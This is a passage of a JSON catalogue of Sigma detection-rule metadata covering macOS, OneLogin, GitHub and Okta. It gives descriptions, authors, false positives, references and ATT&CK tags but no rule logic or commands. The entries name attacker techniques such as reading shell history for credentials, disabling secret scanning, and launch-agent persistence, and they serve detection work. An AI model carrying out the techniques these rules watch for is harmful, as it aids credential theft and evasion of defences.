file" ], "filename": "proc_creation_macos_susp_histfile_operations.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml" ], "tags": [ "attack.credential-access", "attack.t1552.003" ] }, "related": [ { "dest-uuid": "8187bd2a-866f-4457-9009-86b0ddedffa3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "508a9374-ad52-4789-b568-fc358def2c65", "value": "Suspicious History File Operations" }, { "description": "Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.", "meta": { "author": "remotephone", "creation_date": "2021-11-20", "falsepositive": [ "Mistyped commands or legitimate binaries named to match the pattern" ], "filename": "proc_creation_macos_space_after_filename.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_space_after_filename.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.006" ] }, "related": [ { "dest-uuid": "e51137a5-1cdc-499e-911a-abaedaa5ac86", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b6e2a2e3-2d30-43b1-a4ea-071e36595690", "value": "Space After Filename - macOS" }, { "description": "Detects usage of system utilities to discover files and directories", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], 
"filename": "proc_creation_macos_file_and_directory_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "089dbdf6-b960-4bcc-90e3-ffc3480c20f6", "value": "File and Directory Discovery - MacOS" }, { "description": "Detects the addition of a new file or path exclusion to MacOS Time Machine via the \"tmutil\" utility.\nAn adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.\n", "meta": { "author": "Pratinav Chandra", "creation_date": "2024-05-29", "falsepositive": [ "Legitimate administrator activity" ], "filename": "proc_creation_macos_tmutil_exclude_file_from_backup.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine", "https://www.loobins.io/binaries/tmutil/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9acf45ed-3a26-4062-bf08-56857613eb52", "value": "New File Exclusion Added To Time Machine Via Tmutil - MacOS" }, { "description": "Detects potential persistence activity using LaunchAgents 
or LaunchDaemons via the PlistBuddy utility", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-02-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_persistence_via_plistbuddy.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://redcanary.com/blog/clipping-silver-sparrows-wings/", "https://www.manpagez.com/man/8/PlistBuddy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_persistence_via_plistbuddy.yml" ], "tags": [ "attack.persistence", "attack.t1543.001", "attack.t1543.004" ] }, "related": [ { "dest-uuid": "d10cbd34-42e3-45c0-84d2-535a09849584", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "573ad264-1371-4ae0-8482-d2673b719dba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "65d506d3-fcfe-4071-b4b2-bcefe721bbbb", "value": "Potential Persistence Via PlistBuddy" }, { "description": "Detects when a user assumes another user account.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-10-12", "falsepositive": [ "Unknown" ], "filename": "onelogin_assumed_another_user.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "onelogin", "refs": [ "https://developers.onelogin.com/api-docs/1/events/event-resource", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_assumed_another_user.yml" ], "tags": [ "attack.impact" ] }, "uuid": "62fff148-278d-497e-8ecd-ad6083231a35", "value": "OneLogin User Assumed Another User" }, { "description": "Detects when a user account is locked or suspended.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-10-12", "falsepositive": [ "System may lock or suspend user accounts." 
], "filename": "onelogin_user_account_locked.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "onelogin", "refs": [ "https://developers.onelogin.com/api-docs/1/events/event-resource/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_user_account_locked.yml" ], "tags": [ "attack.impact" ] }, "uuid": "a717c561-d117-437e-b2d9-0118a7035d01", "value": "OneLogin User Account Locked" }, { "description": "Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-03-07", "falsepositive": [ "Allowed administrative activities." ], "filename": "github_push_protection_disabled.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://thehackernews.com/2024/03/github-rolls-out-default-secret.html", "https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_push_protection_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ccd55945-badd-4bae-936b-823a735d37dd", "value": "Github Push Protection Disabled" }, { "description": "Detects when a new member is added or invited to a github organization.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023-01-29", "falsepositive": [ "Organization approved new members" ], "filename": "github_new_org_member.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "github", "refs": [ 
"https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_new_org_member.yml" ], "tags": [ "attack.persistence", "attack.t1136.003" ] }, "related": [ { "dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3908d64a-3c06-4091-b503-b3a94424533b", "value": "New Github Organization Member Added" }, { "description": "Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts.\nThis rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories.\n", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023-01-27", "falsepositive": [ "Approved changes by the Organization owner. Please validate the 'actor' if authorized to make the changes." 
], "filename": "github_disabled_outdated_dependency_or_vulnerability.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts", "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_disabled_outdated_dependency_or_vulnerability.yml" ], "tags": [ "attack.initial-access", "attack.t1195.001" ] }, "related": [ { "dest-uuid": "191cc6af-1bb2-4344-ab5f-28e496638720", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34e1c7d4-0cd5-419d-9f1b-1dad3f61018d", "value": "Outdated Dependency Or Vulnerability Alert Disabled" }, { "description": "Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).\n", "meta": { "author": "Romain Gaillard (@romain-gaillard)", "creation_date": "2024-07-29", "falsepositive": [ "Allowed administrative activities." 
], "filename": "github_fork_private_repos_enabled_or_cleared.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#private_repository_forking", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_fork_private_repos_enabled_or_cleared.yml" ], "tags": [ "attack.persistence", "attack.t1020", "attack.t1537" ] }, "related": [ { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "69b3bd1e-b38a-462f-9a23-fbdbf63d2294", "value": "Github Fork Private Repositories Setting Enabled/Cleared" }, { "description": "Detects when a user disables a critical security feature for an organization.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023-01-29", "falsepositive": [ "Approved administrator/owner activities." 
], "filename": "github_disable_high_risk_configuration.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise", "https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization", "https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository", "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_disable_high_risk_configuration.yml" ], "tags": [ "attack.credential-access", "attack.defense-evasion", "attack.persistence", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8622c92d-c00e-463c-b09d-fd06166f6794", "value": "Github High Risk Configuration Disabled" }, { "description": "Detects if the secret scanning feature is disabled for an enterprise or repository.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-03-07", "falsepositive": [ "Allowed administrative activities." 
], "filename": "github_secret_scanning_feature_disabled.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/about-secret-scanning", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_secret_scanning_feature_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3883d9a0-fd0f-440f-afbb-445a2a799bb8", "value": "Github Secret Scanning Feature Disabled" }, { "description": "Detects when a repository or an organization is being transferred to another location.", "meta": { "author": "Romain Gaillard (@romain-gaillard)", "creation_date": "2024-07-29", "falsepositive": [ "Allowed administrative activities." ], "filename": "github_repo_or_org_transferred.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#migration", "https://docs.github.com/en/migrations", "https://docs.github.com/en/organizations/managing-organization-settings/transferring-organization-ownership", "https://docs.github.com/en/repositories/creating-and-managing-repositories/transferring-a-repository", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_repo_or_org_transferred.yml" ], "tags": [ "attack.persistence", "attack.t1020", "attack.t1537" ] }, "related": [ { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "04ad83ef-1a37-4c10-b57a-81092164bf33", "value": "Github Repository/Organization Transferred" }, { "description": "Detects delete action in the Github audit logs for codespaces, environment, project and repo.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023-01-19", "falsepositive": [ "Validate the deletion activity is permitted. The \"actor\" field needs to be validated." ], "filename": "github_delete_action_invoked.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_delete_action_invoked.yml" ], "tags": [ "attack.impact", "attack.collection", "attack.t1213.003" ] }, "related": [ { "dest-uuid": "cff94884-3b1c-4987-a70b-6d5643c621c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "16a71777-0b2e-4db7-9888-9d59cb75200b", "value": "Github Delete Action Invoked" }, { "description": "Detects when a user creates action secret for the organization, environment, codespaces or repository.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023-01-20", "falsepositive": [ "This detection could be noisy depending on the environment. It is recommended to keep a check on the new secrets when created and validate the \"actor\"." 
], "filename": "github_new_secret_created.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_new_secret_created.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.initial-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f9405037-bc97-4eb7-baba-167dad399b83", "value": "Github New Secret Created" }, { "description": "Detects when changes are made to the SSH certificate configuration of the organization.", "meta": { "author": "Romain Gaillard (@romain-gaillard)", "creation_date": "2024-07-29", "falsepositive": [ "Allowed administrative activities." 
], "filename": "github_ssh_certificate_config_changed.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#ssh_certificate_authority", "https://docs.github.com/en/enterprise-cloud@latest/organizations/managing-git-access-to-your-organizations-repositories/about-ssh-certificate-authorities", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_ssh_certificate_config_changed.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2f575940-d85e-4ddc-af13-17dad6f1a0ef", "value": "Github SSH Certificate Configuration Changed" }, { "description": "Detects when a user bypasses the push protection on a secret detected by secret scanning.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-03-07", "falsepositive": [ "Allowed administrative activities." 
], "filename": "github_push_protection_bypass_detected.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://thehackernews.com/2024/03/github-rolls-out-default-secret.html", "https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_push_protection_bypass_detected.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02cf536a-cf21-4876-8842-4159c8aee3cc", "value": "Github Push Protection Bypass Detected" }, { "description": "Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.\n", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023-01-20", "falsepositive": [ "Validate the actor if permitted to access the repo.", "Validate the Multifactor Authentication changes." 
], "filename": "github_outside_collaborator_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions", "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_outside_collaborator_detected.yml" ], "tags": [ "attack.persistence", "attack.collection", "attack.t1098.001", "attack.t1098.003", "attack.t1213.003" ] }, "related": [ { "dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "cff94884-3b1c-4987-a70b-6d5643c621c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eaa9ac35-1730-441f-9587-25767bde99d7", "value": "Github Outside Collaborator Detected" }, { "description": "A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com.\nThis rule detects changes to self-hosted runners configurations in the environment. 
The self-hosted runner configuration changes once detected,\nit should be validated from GitHub UI because the log entry may not provide full context.\n", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023-01-27", "falsepositive": [ "Allowed self-hosted runners changes in the environment.", "A self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 14 days.", "An ephemeral self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 1 day." ], "filename": "github_self_hosted_runner_changes_detected.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners", "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_self_hosted_runner_changes_detected.yml" ], "tags": [ "attack.impact", "attack.discovery", "attack.collection", "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.initial-access", "attack.t1526", "attack.t1213.003", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "e24fcba8-2557-4442-a139-1ee2f2e784db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "cff94884-3b1c-4987-a70b-6d5643c621c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8ed0e8f-7438-4b79-85eb-f358ef2fbebd", "value": "Github Self Hosted Runner Changes Detected" }, { 
"description": "Detects when a Policy Rule is Modified or Deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Unknown" ], "filename": "okta_policy_rule_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "0c97c1d3-4057-45c9-b148-1de94b631931", "value": "Okta Policy Rule Modified or Deleted" }, { "description": "Detects when a new identity provider is created for Okta.", "meta": { "author": "kelnage", "creation_date": "2023-09-07", "falsepositive": [ "When an admin creates a new, authorised identity provider." ], "filename": "okta_identity_provider_created.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_identity_provider_created.yml" ], "tags": [ "attack.persistence", "attack.t1098.001" ] }, "related": [ { "dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "969c7590-8c19-4797-8c1b-23155de6e7ac", "value": "Okta Identity Provider Created" }, { "description": "Detects when the Administrator role is assigned to a user or group.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Administrator roles could be assigned to users or group by other admin users." 
], "filename": "okta_admin_role_assigned_to_user_or_group.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" ], "tags": [ "attack.persistence", "attack.t1098.003" ] }, "related": [ { "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "413d4a81-6c98-4479-9863-014785fd579c", "value": "Okta Admin Role Assigned to an User or Group" }, { "description": "Detects access to Okta admin functions through proxy.", "meta": { "author": "Muhammad Faisal @faisalusuf", "creation_date": "2023-10-25", "falsepositive": [ "False positives are expected if administrators access these functions through a proxy legitimately. 
Apply additional filters if necessary" ], "filename": "okta_admin_activity_from_proxy_query.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/", "https://www.beyondtrust.com/blog/entry/okta-support-unit-breach", "https://dataconomy.com/2023/10/23/okta-data-breach/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_activity_from_proxy_query.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "9058ca8b-f397-4fd1-a9fa-2b7aad4d6309", "value": "Okta Admin Functions Access Through Proxy" }, { "description": "Detects new user account creation", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-25", "falsepositive": [ "Legitimate and authorized user creation" ], "filename": "okta_user_created.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_created.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "b6c718dd-8f53-4b9f-98d8-93fdca966969", "value": "New Okta User Created" }, { "description": "Detects when a user has potentially entered their password into the\nusername field, which will cause the password to be retained in log files.\n", "meta": { "author": "kelnage", "creation_date": "2023-04-03", "falsepositive": [ "Unlikely" ], "filename": "okta_password_in_alternateid_field.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data", "https://developer.okta.com/docs/reference/api/system-log/", "https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_password_in_alternateid_field.yml" ], "tags": [ "attack.credential-access", "attack.t1552" ] }, "related": [ { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91b76b84-8589-47aa-9605-c837583b82a9", "value": "Potential Okta Password in AlternateID Field" }, { "description": "Detects when an application is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Unknown" ], "filename": "okta_application_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "7899144b-e416-4c28-b0b5-ab8f9e0a541d", "value": "Okta Application Modified or Deleted" }, { "description": "Detects when an API Token is revoked.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Unknown" ], "filename": "okta_api_token_revoked.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" ], "tags": [ "attack.impact" ] }, "uuid": "cf1dbc6b-6205-41b4-9b88-a83980d2255b", "value": "Okta API Token Revoked" }, { "description": "Detects when an Okta end-user reports activity by their account as being potentially suspicious.", "meta": { "author": "kelnage", "creation_date": "2023-09-07", 
"falsepositive": [ "If an end-user incorrectly identifies normal activity as suspicious." ], "filename": "okta_suspicious_activity_enduser_report.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/okta/workflows-templates/blob/master/workflows/suspicious_activity_reported/readme.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_suspicious_activity_enduser_report.yml" ], "tags": [ "attack.resource-development", "attack.t1586.003" ] }, "related": [ { "dest-uuid": "3d52e51e-f6db-4719-813c-48002a99f43a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07e97cc6-aed1-43ae-9081-b3470d2367f1", "value": "Okta Suspicious Activity Reported by End-user" }, { "description": "Detects when a security threat is detected in Okta.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Unknown" ], "filename": "okta_security_threat_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", "value": "Okta Security Threat Detected" }, { "description": "Detects when an application Sign-on Policy is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Unknown" ], "filename": "okta_application_sign_on_policy_modified_or_deleted.yml", "level": "medium", 
"logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "8f668cc4-c18e-45fe-ad00-624a981cf88a", "value": "Okta Application Sign-On Policy Modified or Deleted" }, { "description": "Detects when an API token is created", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Legitimate creation of an API token by authorized users" ], "filename": "okta_api_token_created.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "19951c21-229d-4ccb-8774-b993c3ff3c5c", "value": "Okta API Token Created" }, { "description": "Detects when a user account is locked out.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Unknown" ], "filename": "okta_user_account_locked_out.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ 